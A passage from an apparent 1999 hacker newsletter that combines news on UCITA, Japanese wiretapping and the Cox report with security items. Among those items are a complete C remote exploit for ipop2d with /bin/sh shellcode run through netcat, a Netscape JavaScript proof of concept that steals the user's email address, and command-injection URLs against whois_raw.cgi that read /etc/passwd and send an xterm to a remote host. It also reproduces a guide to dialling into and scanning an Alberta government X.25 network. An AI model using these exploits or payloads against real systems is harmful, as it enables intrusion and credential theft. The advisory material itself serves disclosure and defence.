costs," says Susan Nycum, a SIM member and an attorney at law firm Baker & McKenzie, in Palo Alto, Calif. Although many software vendor representatives attended development meetings to discuss the law and lobbied its creators, most attendees contacted by InfoWorld refused to discuss their views on the record. And although this law threatens to profoundly affect how IT departments in both large and small companies do business, most IT professionals remain unaware of the law and its ramifications. "We were naive about how things were handled," says Randy Roth, a SIM member who also works at the Principal Financial Group, in Des Moines, Iowa. "We thought, gee, when people are writing these laws they are making sure they are balanced and somebody is watching out for our best interests." Blackmail tool? To the IT managers who have been following UCITA, perhaps the most threatening provision is vendor "self-help," or vendor repossession of software. According to the most recent draft of the law, a vendor can remotely disable a customer's software if the vendor decides that the customer has violated its license and the license includes language that says self-help is a possibility. The proposed law would require the vendor to notify a company representative designated in the contract 15 days prior to taking such action, although it does not specify the means of notifying that representative. Such messages could spend weeks languishing in voice mail or e-mail if the wrong person happens to be on vacation. "Self-help is a draconian remedy in which the licensor would act as judge, jury, and executioner to electronically disable or repossess software when in its self determination, the licensee has done something bad," says Barney Kantar, a member of SIM who also works at Dupont, in Wilmington, Del. UCITA's champions counter that the software market would not tolerate vendors who shut off customers' software. "So far the market has been a very good disciplinarian," says Micalyn Harris, vice president, secretary, and general counsel at Winpro, in Ridgewood, N.J. "Anyone who gets a reputation for shutting off software on customers is not very likely to stay in business." But fear of getting a bad reputation has not stopped vendors from taking such draconian measures in the past. The most extreme case of a vendor repossessing software happened almost 10 years ago. Logisticon, a software vendor in Santa Clara, Calif., shut down Revlon Group's systems over the phone lines because it said Revlon had not paid the remaining $180,000 balance of a $1.2 million contract for warehouse management software. In a subsequent lawsuit, Revlon claimed its shipping operations were shut down for three days. The case was settled out of court in late 1990. As part of the settlement, the parties agreed not to divulge the terms. Because UCITA specifically authorizes electronic self-help, critics say that software developers would have legal justification to build back doors and software time bombs in their programs. That itself would create a tremendous threat and reduce users' negotiating power, whether the license specified the self-help rights or not. "The real danger of self-help is not so much that it will be invoked, but rather that it will be used as a threat hanging over licensees in order to extort compromises, concessions, and other payments that they would not otherwise agree to provide," Dupont's Kantar adds. Adobe Systems corporate counsel Vincent Bryan, however, argues that according to current law, a vendor could shut down a customer without any notice. The self-help provisions of UCITA, he says, are designed to protect the software customer. "What [the self-help provision] attempted to do was to reach a compromise between what SIM wanted -- which was that you had to go to court and trial before a small licensor could get paid," Bryan says. John McCabe, NCCUSL legal counsel and legislative director, calls UCITA's provisions on vendor self-help a middle position. "We are not banning this; we are not requiring judicial permission," McCabe says. "We are just putting parameters around it." McCabe added that vendors are not permitted to exercise self-help if the vendors are aware of third parties that could suffer serious losses because of it. Although Microsoft's UCITA representative, senior corporate attorney Robert W. Gomulkiewicz, requested that he not be quoted, a Microsoft public relations representative agreed that the law is designed to protect customers. But the law's detractors dispute that vendor self-help provisions protect consumers, and they find this to be the most threatening aspect of the proposed law. "Once we have licensed a product and put it into mission-critical use, self-help becomes a blackmail tool," Principal's Roth says. "Customers have no negotiating power at all." Pass-alongs prohibited Another UCITA provision could increase the costs of mergers and acquisitions by prohibiting the transfer of a software license from one company to another without permission from the vendor. Many shrink-wrapped licenses have blanket restrictions on transferability already, but vendors generally do not try to get a court to enforce them in a merger. UCITA would make those terms enforceable. For example, if you have Microsoft Word on your computer, you will need to obtain permission from Microsoft to transfer that copy of Word from Company A to Company B, according to Cem Kaner, a career software developer in Santa Clara, Calif., an attorney, and the author of Bad Software: What to do when software fails. "Imagine doing that for all the computer programs, utilities, drivers, printer drivers, clip art, fonts," Kaner says. "At some point the cost of having lawyers inspect every utility to figure out how to transfer it becomes too high. What will happen is people will simply erase the hard drives on the machines." Software vendors argue that they are within their rights to limit the use of their products. "Licenses tell users what it is that creators or providers of software regard as fair use," Winpro's Harris says. Those definitions of fair use included in licenses have become more aggressive as the years have gone by, according to SIM, and often include transfer restrictions. "If I buy a book, I can't make a copy and sell it. But I can sell my copy of the book or I can give away my copy," Dupont's Kantar says. "The same should be true for software." However, UCITA transforms software from a product into a license to use this product, according to attorney Kaner. "That flies in the face of how we have dealt with intellectual property in the past," Kaner says. "If you put something into the mass market, your rights as far as transferability end when the first buyer gives you the money." But some vendors believe that because software is fundamentally different from other products, it deserves new rules. "What UCITA is doing is validating the terms [of sale] after you pay," Adobe's Bryan says. "The academic community and consumer groups are saying that's not right -- the contract should be what the parties agree to at the time there is a transaction." Bryan notes that airline tickets and rental-car reservations' licensing terms are not revealed until after sales are completed. Not my fault Another hotly contested provision of UCITA is one that allows vendors to disclaim warrantees for defective, buggy, or virus-infested software. Today, any features that a vendor demonstrates at a trade show or writes about in a product manual must be a working part of the product, according to Kaner, because under current law, any statement or affirmation of fact by seller to buyer is part of the basis of the bargain. "UCITA takes the notion of a warrantee by demonstration and guts it," Kaner says. "And in the mass market, UCITA makes it trivially easy to disclaim warrantees." Although proponents claim that the provisions in UCITA are not a change from the current law, other industry observers view UCITA as a license for commercial developers to turn out buggier software. "It says manufacturers are not liable for the poor quality of their products," according to Watts Humphrey, a fellow of the Software Engineering Institute, a development institution with headquarters at Carnegie-Mellon University, in Pittsburgh. "I think that is bad for the nation." The licensing loopholes that UCITA provides will cause lowered standards for software performance and will cost user companies more money because they will have to assure that the product works properly before they buy it, according to Baker & McKenzie's Nycum. Software vendors counter that they need protection from customers in the fuzzy area of computer performance guarantees. "If I have to guarantee that my software will perform the way you think it's going to perform, that's going to be costly for me," Winpro's Harris says. "Software isn't like a piece of furniture -- there are many other variables." But critics do not believe software companies need more legal protection than they already have. "I have yet to hear a good argument as to why the software industry needs more than it has today," Dupont's Kantar says. "They are enjoying double-digit growth and huge success in the marketplace. Why does the software industry need protection?" Detractors also fear that UCITA will turn shrink-wrapped software licensing agreements -- which have become more and more restrictive over time -- into enforceable law. For example, many licensing agreements today state that customers who test the vendor's software are not allowed to publish the results of those tests, Kantar says. "We frequently see license agreements that attempt to restrict free speech in prohibitions against publishing test results," Kantar explains. "UCITA would permit a licensor to restrict such fair use under a contract." Many licensing agreements that come with shrink-wrapped software are "questionable at best," Principal's Roth says. "I would never put my name on a contract like that, so why should I be forced to accept it if I'm going to buy a lot of shrink-wrapped software?" Read the fine print SIM members also say they believe that the cost of procurement will rise if UCITA becomes law because companies will have to scrutinize shrink-wrapped software licenses as closely as those of mainframes and other large systems. "Large companies spend about as much on shrink-wrapped software as they do on non-shrink-wrapped software," Kantar says. "Today most businesses don't devote significant resources to the negotiation of shrink-wrapped licenses. They will now have to start doing so because the default rules are shifting in favor of the licensor." UCITA has other controversial provisions, leading the act's detractors to say it is too flawed to fix. "If you are going to come up with a law that will last another 50 years, it needs to be written to be flexible and fair, and not [as] a wish list of what vendors want right now," Baker & McKenzie's Nycum says. Michael Lattig, Bob Trott, and Jeff Walsh contributed to this article. www.infoworld.com For more on Uniform Computer Information Transactions Act (UCITA), go to www.infoworld.com/UCITA. Information about UCITA's precursor, the Uniform Commercial Code 2B draft, and subsequent motions are available at www.2bguide.com. A list of National Conference of Commissioners on Uniform State Laws (NCCUSL) representatives is at www.simnet.org/public/programs/issues/ucccode.html. NCCUSL can be reached at www.nccusl.org. The Society of Information Managers can be reached at www.simnet.org. The origins of a law The Uniform Computer Information Transactions Act (UCITA) began as a proposed change to the Uniform Commercial Code's Article 2, which dealt with the sale of goods. The Uniform Commercial Code (UCC) are laws designed to make commerce uniform from state to state. These laws are written by the National Conference of Commissioners on Uniform State Laws (NCCUSL), a group founded in the late 19th century during the states' rights movement and approved by the American Law Institute (ALI). The commissioners are attorneys, usually from small law firms, appointed and paid for by the states to represent them to the Conference. Once NCCUSL approves a bill, it is very likely to be passed by state governments. The ALI advises NCCUSL on creating amendments to the UCC. ALI is largely an honorary, academic organization of tenured law professors. ALI officials called NCCUSL's 2B draft "unbalanced" and declined to put it to a membership vote at their annual meeting earlier this month. NCCUSL decided then to make 2B a stand-alone bill, not part of the UCC. The proposed law then became known as UCITA. A current draft of UCITA was not available at press time. @HWA 12.0 Japan Follows Australia in Limiting Privacy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by erewhon In an effort to to help law enforcement stop murders, drug trafficking, gun running, and illegal immigration, Japan is proposing new draconian legislation that will give sweeping power to eavesdrop on all communications. This includes telephone and email. Wired Japan: More Crime, Less Privacy by David Lazarus 3:00 a.m. 2.Jun.99.PDT TOKYO -- Privacy issues have taken center stage as Japan prepares to enact legislation allowing the police to eavesdrop on phone calls, intercept fax and computer transmissions, and read email. The draconian measures are ostensibly intended to help law enforcement halt premeditated murders, trafficking in drugs and guns, and smuggling of illegal aliens into Japan. At least that's what a bill cobbled together by the country's coalition government says. The reality could be far more intrusive, especially after investigators receive an official green light to comb through private correspondence and communications. Japanese citizens' groups -- a hodgepodge of activists with little actual influence over policy decisions -- have decried the wiretapping legislation as a gross invasion of privacy, and opposition politicians boycotted a vote on the legislation last Friday. But the government insists that what Japan needs to restore public order is less civil liberty and more Big Brother. People here are scared. Crime -- once unthinkable in Japan -- is on the rise. The country's yakuza racketeers are growing increasingly bolder in their schemes as nearly a full decade of recession eats away at traditional revenue sources, such as payoffs from companies and corrupt politicians. For law-enforcement authorities, the trouble began back in 1995 when Aum Shinrikyo cultists released sarin gas in the Tokyo subway, killing a dozen people. The cops simply never saw the attack coming, and have been agitating for greater surveillance powers as a means of preventing such nastiness from happening again. Wiretapping is a convenient shortcut for investigators. And, as the pervasive eavesdropping of former East Bloc countries made undeniably clear, once authorities start listening it's a hard habit to break. Yozo Marutake, a former senior executive with a manufacturer of hearing aids called Rion, said last week that the Japanese police have been bugging phones for decades. How does he know this? Because his company sold the cops all their surveillance gear, and had done so since first being approached by authorities in 1957, he said. So why would the Japanese police now be seeking legal backing for their electronic skulking? One reason might have to do with charges from an opposition politician last year that his phone had been bugged. The courts upheld the politician's claims, although the cops never actually admitted being behind the incident. The Internet undoubtedly will be a low priority at first for Japan's snoops, but this will change as more people, criminals included, go online. For now, it looks like the cops are still unsure how to proceed where matters of cyberspace are concerned. Police last week raided the Sapporo home of an 18-year-old who had posted a bunch of hit tunes on his home page using the MP3 compression format. The teen, needless to say, hadn't worked out copyright issues in advance with related Japanese recording companies. Police didn't reveal how they learned about the song-laden site. But they said they moved quickly to shut things down after concluding that illegal actions were being perpetrated. This only took them three months of monitoring downloads to figure out. David Lazarus is on special assignment. He is filing occasional dispatches on the current state of business and technology in Japan. @HWA 13.0 AGNPAC Revealed ~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Hack.Canada A document describing the Alberta Government Packet Switched Network (AGNPAC) has been released by Hack Canada. This document goes into great detail about the X.25 WAN that spans Alberta. Hack Canada http://www.hackcanada.com/homegrown/agnpac_guide.txt Complete Guide to AGNPAC v1.0 CYB0RG/ASM www.hackcanada.com 05.30.99 ---------------- What is AGNPAC? ---------------- AGNPAC is the Alberta Government Packet Switched Network based on the X.25 protocol. It is a Wide Area Network which spans across Alberta. It is used to connect systems and networks used by the Alberta Government, Alberta Registries, hospitals, schools, libraries, and other such entities. The backbone for this network is made up of full T1 fibre optic lines. Other WAN's and nodes are connected to the AGNPAC backbone via T1, 128K Frame Relay circuits (full CIR), and multiple 128K Frame Relay circuits. The network can also be connected to through local dialups in most cities and large towns in Alberta. AGNPAC is built, managed, and maintained by Alberta Public Works Supply and Service (PWSS) and funded by the Alberta provincial government. Recently publicly funded school board use has also come into play with beta trials becoming more widespread through the late nineties. The AGNPAC network has been in existance since at least 1995, however, no information regarding it has been publicly available... until now. There is still much to learn about this network, and this file, the most complete publicly available document on AGNPAC, is still somewhat lacking. However, this file will be updated as new discoveries are made. --------------------- Connecting to AGNPAC --------------------- Dial ports exist in most major towns and cities across Alberta. The standard communication parameter 8/N/1 is used although some systems on AGNPAC may use 7/E/1. When you connect you will see a message similar to this: AGNPAC: 4007 030 ----------- Dial Ports ----------- Athabasca 675-9424 Barrhead 674-2045 Blairmore 562-7426 Bonnyville 826-1753 Brooks 793-2254 Calgary 234-8066 Calgary 269-7425 v.34 only Camrose 672-3689 Canmore 678-6966 Cardston 653-1006 Claresholm 625-2241 Drayton Valley 542-6038 Drumheller 823-4224 Edmonton 420-6198 v.34 only Edmonton 425-5674 Edmonton 425-5691 Edmonton 429-1522 Edson 723-5352 Evansburg 727-3572 Fairview 835-5688 Fort McMurray 743-6302 Grande Cache 827-2044 Grande Prairie 539-0195 Hanna 854-2615 High Level 926-2142 High Prairie 523-2673 Hinton 865-1393 Jasper 852-4846 Lac La Biche 623-3832 Lethbridge 380-2067 Lloydminster 875-1237 Manning 836-2683 Medicine Hat 528-2135 Olds 556-2930 Oyen 664-2505 Peace River 624-1055 Pincher Creek 627-2444 Red Deer 341-4097 Rocky Mountain House 845-5552 Slave Lake 849-2826 Smoky Lake 656-2291 St. Paul 645-1847 Stettler 742-5581 Valleyview 524-2454 Vegreville 632-2213 Vermillion 853-6941 Wainwright 842-5103 Wetaskiwin 352-2384 Whitecourt 778-4677 ------------------ System Addressing ------------------ Systems attached to AGNPAC are addessed most commonly by 9 digit Network User Addresses (NUA's). That's 1 billion possible NUA's. These NUA's follow a simple format of 9 consecutive digits (#########). Other NUA formats may exist but the only exception to the 9 digit NUA that I know of is something I call an "alias". Aliases are acronyms preceded by a dot. These aliases resolve to a regular NUA which is revealed when you connect to the host. Here are some examples of known aliases and their corresponding NUA's: .govtcpdial = 4004 11188 .cgsbbs = 4004 059010 (oddly enough this resolves to a 10 digit NUA) Anyway, back to the NUA's. As far as I can tell the 9 digit NUA's have a 4 digit prefix and a 5 digit suffix. Or possibly they break down like this: (####)(###)(##) : : : City Code? ..: : : : : Address Prefix? ........: : : System Address? .............: But that's just a hunch I've got based on the NUA's that I know of. I also have reason to believe there may be system subaddressing, or Logical Channels (LCN), in which case the address may be suffixed with 1 or 2 digits to connect to a subaddress of the system. And there may also be mnemonics, data characters which follow the address preceded by a comma. Mnemonics are used to connect to sub-systems of the host system. But again, this is all just speculation for now. ---------------------------- Connecting to a Host System ---------------------------- To connect to a system you enter it's NUA and if it is valid you will get a message like this: AGNPAC: call connected to #### ##### Now you may receive an identifying message and the system's prompt depending on the system, or you may get a connect message and no prompt at all. Sometimes if you press it will forward you to the hosts prompt. To disconnect from a host that you have connected to and get back to the main prompt use the command "p clr". For a list of known NUA's refer to the "AGNPAC NUA Directory" (agnpacnua.txt) on www.hackcanada.com in the Canadian H/P-Hacking section. --------------------- Command Line Options --------------------- Some of these are used from the main prompt and some are used in conjunction with an NUA. Further experimentation is still forthcoming. Command Use Description ------- --------------------------- ------------------------------- c Closed User Group clr Preceded by p Used to clear a circuit locally f [Restricted] Fast Select int Preceded by p ??? l Packet Size n n ######### (where # is NUA) Normal call (default) p p ######### (where # is NUA) Priority call par? Displays parameters reset Preceded by p Resets locally set : [,:] Sets parameters stat Displays statistics ------------------- Scanning for NUA's ------------------- The most important thing to know when scanning NUA's on AGNPAC is how to disconnect from an NUA that you have connected to and get back to the main prompt. This is done with the command "p clr". The second most important thing to know is that you will be disconnected from AGNPAC after ten failed attempts in a row. You will want to connect then disconnect from a known good NUA after every 8 or 9 failed attempts. --------------- Error Messages --------------- More often than not when scanning for NUA's you will get an error message rather than a call connected message. There are simply FAR more unassigned NUA's than there are NUA's in use. Here is a guide to error messages and their meanings. AGNPAC: call cleared - address not in service The most common message. It means the address is currently not assigned to a host system. AGNPAC: call cleared - access barred The calling terminal is not permitted to establish a connection to the host system. AGNPAC emits this error message on direction from the host. It is a system that only accepts calls from specified originating NUA's. AGNPAC: comma required before data characters This message is common when you mistype an NUA. This message may refer to the use of mnemonics to connect to sub-systems of the host as mentioned in the "System Addressing" section of this file. AGNPAC: call cleared - destination busy The host system may just be temporarily busy, permanently busy, or down. AGNPAC: call cleared - destination not responding The host is ignoring your connect request or it is down. AGNPAC: call cleared - remote directive This is likely a clearing of the virtual circuit in response to a clear request packet sent from the host system. The right subaddressing and/or mnemonics can probably get by this. AGNPAC: call cleared - local directive This message indicates that the user has used the command "p clr" to clear the virtual circuit in order to disconnect from an NUA. AGNPAC: call cleared - temporary network problem The host system is either temporarily or permanently down. AGNPAC: invalid command Invalid command line option. AGNPAC: command not allowed Command line option used improperly. AGNPAC: invalid packet size Command line option "l" was used in conjunction with an invalid packet size. AGNPAC: service option not subscribed Some NUA's result in this message. I don't know why. -------- Credits -------- Shouts to The Clone and Wizbone for helping pioneer research on this network. And to Deicide for the file "Introduction to Datapac" which gave me insight into command line options. Copyright (c) 1999 Hack Canada @HWA 14.0 Bomb Making Info Available, For Nukes! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by akeldama The Chinese are claiming that the recently released Cox report that lambasted computer security at the Department of Energy and pointed the finger at China for stealing US Nuclear secrets was a total farce. China is claiming that the nuclear 'secrets' it supposedly stole are in fact freely available on the web, so just how secret can they be. Better Grab your nuclear info before it to disappears. Internet News http://www.internetnews.com/intl-news/article/0,1087,6_129241,00.htm Federation Of American Scientists http://www.fas.org/ China Says Nuke Data Is On Web June 1, 1999 By Hans Lombardo Managing Editor, asia.internet.com International News Archives [Hong Kong, CHINA] In a seething attack on the Cox Report, the Chinese government yesterday declared that performance data on US nuclear warheads was available on the Web and in printed publications. Zhao Qizheng, the information minister for China's State Council, told reporters in press conference that "performance data on the seven types of nuclear warheads--W56, W62, W70, W76, W78, W87 and W88--have long been openly published in the United States." "In recent years, performance data about various types of nuclear warheads, ranging from the early MK-1 to the latest W88, can easily be found on the Internet," stated Zhao. The minister demonstrated how this nuclear warhead information was easily available on the website of the Federation of American Scientists (FAS). The FAS website provides users with a "Complete List of All U.S. Nuclear Weapons". The Cox Report is the published findings of a US congressional probe lead by Republican Christopher Cox which alleges that China plundered nuclear weapons secrets from the United State over the last two decades. The Beijing regime has condemned the report as a politically motivated attempt by forces in the United States to damage US-China relations and prevent China from developing into a economic power. "the Chinese Government and people are strongly indignant over this groundless attack that fabricates facts and confuses black and white," Zhao also said about the report. "This is a great slander against the Chinese nation and is typical racial prejudice," Zhao added. The Chinese government has also criticized the Cox Report's suggestion it that the United States intensify control over the export of dual-purpose commodities and technology to China. "It even unreasonably demands China should establish a so-called open and transparent system which enables American nationals designated by the United States to examine on the spot the end-users without advance notice," said Zhao. "This is a hegemonic act that disregards China's sovereignty and violates the basic norms governing international relations." Some local infopreneurs are concerned that a possible US backlash against the export of technologies to China will have an impact on China and Hong Kong's IT infrastructure development. 15.0 Exploit code for remote ipop2d security vulnerability that gives attacker a shell as user 'nobody'. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml By c0nd0r, Sekure SDI. /* * Sekure SDI (Brazilian Information Security Team) * ipop2d remote exploit for linux (Jun, 02 1999) * * by c0nd0r * * (read the instructions below) * * Thanks to jamez, bahamas, dumped, bishop, slide, paranoia, stderr, * falcon, vader, c_orb, marty(nordo!) and minha malinha! * also to #uground (irc.brasnet.org) and #SDI (efnet), * guys at el8.org, toxyn.org, pulhas.org * * Sincere Apologizes: duke (for the mistake we made with the wu-expl), * your code rocks. * * Usage: * * SDI-pop2 [offset] * * where imap_server = IMAP server at your box (or other place as well) * user = any account at your box * pass = the account's password * offset = 0 is default -- increase if it's necessary. * * Example: (netcat rocks) * * (./SDI-pop ppp-666.lame.org rewt lame 0; cat) | nc lame.org 109 * * ---------------------------------------------------------------- * HOWTO-exploit: * * In order to gain remote access as user nobody, you should set * an IMAP server at your box (just edit the inetd.conf) or at * any other machine which you have an account. * * During the anonymous_login() function, the ipop2d will set the * uid to user nobody, so you are not going to get a rootshell. * ---------------------------------------------------------------- * */ #include /* * (shellcode) * * jmp 0x1f * popl %esi * movl %esi,0x8(%esi) * xorl %eax,%eax * movb %eax,0x7(%esi) * movl %eax,0xc(%esi) * movb $0xb,%al * movl %esi,%ebx * leal 0x8(%esi),%ecx * leal 0xc(%esi),%edx * int $0x80 * xorl %ebx,%ebx * movl %ebx,%eax * inc %eax * int $0x80 * call -0x24 * .string \"/bin/sh\" * grab your shellcode generator at www.sekure.org */ char c0d3[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89" "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c" "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff" "\xff\xff/bin/sh"; main (int argc, char *argv[] ) { char buf[2500]; int x,y=1000, offset=0; long addr; char host[255], user[255], pass[255]; int bsize=986; if ( argc < 4) { printf ( "Sekure SDI ipop2d remote exploit - Jun, 02 1999\n"); printf ( "usage: (SDI-pop2 [offset];cat) | nc lame.org 109\n"); exit (0); } snprintf ( host, sizeof(host), "%s", argv[1]); snprintf ( user, sizeof(user), "%s", argv[2]); snprintf ( pass, sizeof(pass), "%s", argv[3]); if ( argc > 4) offset = atoi ( argv[4]); /* gimme the ret + offset */ addr = 0xbffff3c0 + offset; fprintf ( stderr, "0wning data since 0x%x\n\n", addr); /* calculation of the return address position */ bsize -= strlen ( host); for ( x = 0; x < bsize-strlen(c0d3); x++) buf[x] = 0x90; for ( y = 0; y < strlen(c0d3); x++, y++) buf[x] = c0d3[y]; for ( ; x < 1012; x+=4) { buf[x ] = addr & 0x000000ff; buf[x+1] = (addr & 0x0000ff00) >> 8; buf[x+2] = (addr & 0x00ff0000) >> 16; buf[x+3] = (addr & 0xff000000) >> 24; } sleep (1); printf ( "HELO %s:%s %s\r\n", host, user, pass); sleep (1); printf ( "FOLD %s\r\n", buf); } @HWA 16.0 Netscape Communicator 4.x "view-source:" JavaScript based security vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml Date: Tue, 1 Jun 1999 19:08:49 +0300 From: Georgi Guninski To: BUGTRAQ@netspace.org Subject: Netscape Communicator "view-source:" security vulnerabilities There is a security vulnerability in Netscape Communicator 4.6 Win95, 4.07 Linux (probably all 4.x versions) in the way it works with "view-source:wysiwyg://1/javascript" URLs. It parses them in a "view-source" window. The problem is that it allows access to documents included in the parent document via ILAYER SRC="view-source:wysiwyg://1/" using find(). That allows reading the whole parsed document. Vulnerabilites: Browsing local directories Reading user's cache Reading parsed HTML files Reading Netscape's configuration ("about:config") including user's email address, mail servers and password. Probably others This vulnerability may be exploited by using HTML email message. Workaround: Disable JavaScript Netscape is notified about the problem. Demonstration is available at: http://www.nat.bg/~joro/viewsource.html Regards, Georgi Guninski http://www.nat.bg/~joro http://www.whitehats.com/guninski [ Part 2: "Attached Text" ] [ The following text is in the "koi8-r" character set. ] [ Your display is set for the "US-ASCII" character set. ] [ Some characters may be displayed incorrectly. ] There is a security vulnerability in Netscape Communicator 4.6 Win95, 4.07 Linux (probably all 4.x versions) in the way it works with "view-source:wysiwyg://1/javascript" URLs. It parses them in a "view-source" window. The problem is that it allows access to documents included in the parent document via ILAYER SRC="view-source:wysiwyg://1/" using find(). That allows reading the whole parsed document. Vulnerabilites: _________________________________________________________________________________________________________________________________ Browsing local directories Reading user's cache Reading parsed HTML files Reading Netscape's configuration ("about:config") including user's email address, mail servers and password. Probably others This vulnerability may be exploited by using HTML email message. _________________________________________________________________________________________________________________________________ Workaround: Disable JavaScript _________________________________________________________________________________________________________________________________ This demonstration tries to find your email address, it may take some time. Written by Georgi Guninski _________________________________________________________________________________________________________________________________ s="view-source:wysiwyg://1/javascript:s='vvvv>&>"" +"" +" blur();msg1=\"Your email is: \"; mend=\"general.\"+\"title_tips\";mag=\"mail.identity.useremail\"+\" = \";sp=\" \";res=mag;charstoread=50;" +"setTimeout(\" " +"for(i=0;i'"; //a=window.open(s); location=s; ----------------------------------------------------------------------------------------------------- There is a security vulnerability in Netscape Communicator 4.6 Win95, 4.07 Linux (probably all 4.x versions) in the way it works with "view-source:wysiwyg://1/javascript" URLs. It parses them in a "view-source" window. The problem is that it allows access to documents included in the parent document via ILAYER SRC="view-source:wysiwyg://1/" using find(). That allows reading the whole parsed document.
Vulnerabilites:
Browsing local directories
Reading user's cache
Reading parsed HTML files
Reading Netscape's configuration ("about:config") including user's email address, mail servers and password.
Probably others

This vulnerability may be exploited by using HTML email message.
Workaround: Disable JavaScript
This demonstration tries to find your email address, it may take some time.

Written by Georgi Guninski
@HWA 17.0 Vulnerability in Broker FTP Server v. 3.0 Build 1 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml Date: Tue, 1 Jun 1999 07:24:24 +0200 From: Arne Vidstrom To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Vulnerability in Broker FTP Server v. 3.0 Build 1 Hi, I've found a vulnerability in Broker FTP Server v. 3.0 Build 1. Here's an example: You have it installed with FTP root in c:\FTProot and you have a user "test" with home directory in c:\FTProot\test. You also have checked the "Display as ROOT directory" checkbox for test, so he/she can't get below the home directory. CWD won't take him/here below it, but LIST will: LIST ..\..\winnt\ will list the contents of c:\winnt and NLST ..\..\winnt\ will also list the contents of c:\winnt. Of course this isn't as bad as if CWD or RETR had worked, but you probably don't want anybody to be able to look around in your private directories... I've contacted Transsoft about this, and they should have released a new version that fixed this more than a week ago. I've contacted them again but they haven't given me a reply this time. /Arne Vidstrom @HWA 18.0 whois_raw.cgi problem ~~~~~~~~~~~~~~~~~~~~~ From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml Date: Tue, 1 Jun 1999 00:34:51 +0200 From: Salvatore Sanfilippo -antirez- To: BUGTRAQ@netspace.org Subject: whois_raw.cgi problem Hi, sorry if this has already been known. There is a problem in whois_raw.cgi, called from whois.cgi. whois_raw.cgi is part of cdomain v1.0. I don't know if new versions are vulnerable. #!/usr/bin/perl # # whois_raw.cgi Written by J. Allen Hatch (zone@berkshire.net) # 04/17/97 # # This script is part of the cdomain v1.0 package which is available at: # http://www.your-site.com/~zone/whois.html ... require ("/usr/lib/perl5/cgi-lib.pl"); ... $fqdn = $in{'fqdn'}; # Fetch the root name and concatenate # Fire off whois if ($in{'root'} eq "it") { @result=`$whois_cmd_it $fqdn`; } elsif ($in{'fqdn'} eq "alicom.com" || $in{'fqdn'} eq "alicom.org") { @result="Dettagli non disponibili per il dominio richiesto."; } else { @result=`$whois_cmd $fqdn`; } ... The exploit is banal and well known problem: http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20graziella.lame.org:0 bye, antirez -- Salvatore Sanfilippo antirez | md5330@mclink.it | antirez@alicom.com try hping: http://www.kyuzz.org/antirez antirez@seclab.com 'se la barca non ce l'hai dove uzba te ne vai? se la barca te la ruba, preo.' (M. Abruscato & O. Carmeci) --------------------------------------------------------------------------------- Date: Wed, 2 Jun 1999 00:16:42 +0200 From: Peter van Dijk To: BUGTRAQ@netspace.org Subject: Re: whois_raw.cgi problem On Tue, Jun 01, 1999 at 12:34:51AM +0200, Salvatore Sanfilippo -antirez- wrote: > Hi, > > sorry if this has already been known. > > There is a problem in whois_raw.cgi, called from > whois.cgi. whois_raw.cgi is part of cdomain v1.0. > I don't know if new versions are vulnerable. Version 2.0 is just as vulnerable. The commercial version (the one that runs on NT too :) is _not_ vulnerable since it does it's own socket thing instead of starting 'whois'. I've known of this bug in cdomain for about 6 months but never got around to writing up an advisory... Greetz, Peter -- | 'He broke my heart, | Peter van Dijk | I broke his neck' | peter@attic.vuurwerk.nl | nognikz - As the sun | Hardbeat@ircnet - #cistron/#linux.nl | | Hardbeat@undernet - #groningen/#kinkfm/#vdh | --------------------------------------------------------------------------------- Date: Wed, 2 Jun 1999 01:06:22 +0200 From: Peter van Dijk To: BUGTRAQ@netspace.org Subject: Re: whois_raw.cgi problem On Wed, Jun 02, 1999 at 12:16:42AM +0200, Peter van Dijk wrote: > On Tue, Jun 01, 1999 at 12:34:51AM +0200, Salvatore Sanfilippo -antirez- wrote: > > Hi, > > > > sorry if this has already been known. > > > > There is a problem in whois_raw.cgi, called from > > whois.cgi. whois_raw.cgi is part of cdomain v1.0. > > I don't know if new versions are vulnerable. > > Version 2.0 is just as vulnerable. > > The commercial version (the one that runs on NT too :) is _not_ vulnerable > since it does it's own socket thing instead of starting 'whois'. > > I've known of this bug in cdomain for about 6 months but never got around > to writing up an advisory... To elaborate this a bit further: cdomain-free 2.4 and lower are _vulnerable_. cdomain-free 2.5 and all commercial cdomain versions I've seen are _not_ vulnerable, because they connect to the whois servers themselves. cdomain-free is available for download at www.cdomain.com. Greetz, Peter -- | 'He broke my heart, | Peter van Dijk | I broke his neck' | peter@attic.vuurwerk.nl | nognikz - As the sun | Hardbeat@ircnet - #cistron/#linux.nl | | Hardbeat@undernet - #groningen/#kinkfm/#vdh | @HWA 19.0 Linux kernel 2.2.x vulnerability/exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml Date: Tue, 1 Jun 1999 17:43:17 +0200 From: Piotr Wilkin To: BUGTRAQ@netspace.org Subject: Linux kernel 2.2.x vulnerability/exploit I'm sorry if this has been noticed before, but since I did't find anything in the archives, I post it here. There seems to be a bug in kernels 2.2.x (tested on 2.2.7 and 2.2.9), that causes them to panic when they are sent a large number of specific ICMP packages. I think the problem comes from the combination of the mangled header length (shorter or longer ihl's don't cause hangup) and the random ICMP packets (random type/subtype and source address) this program sends. Windows 9x and 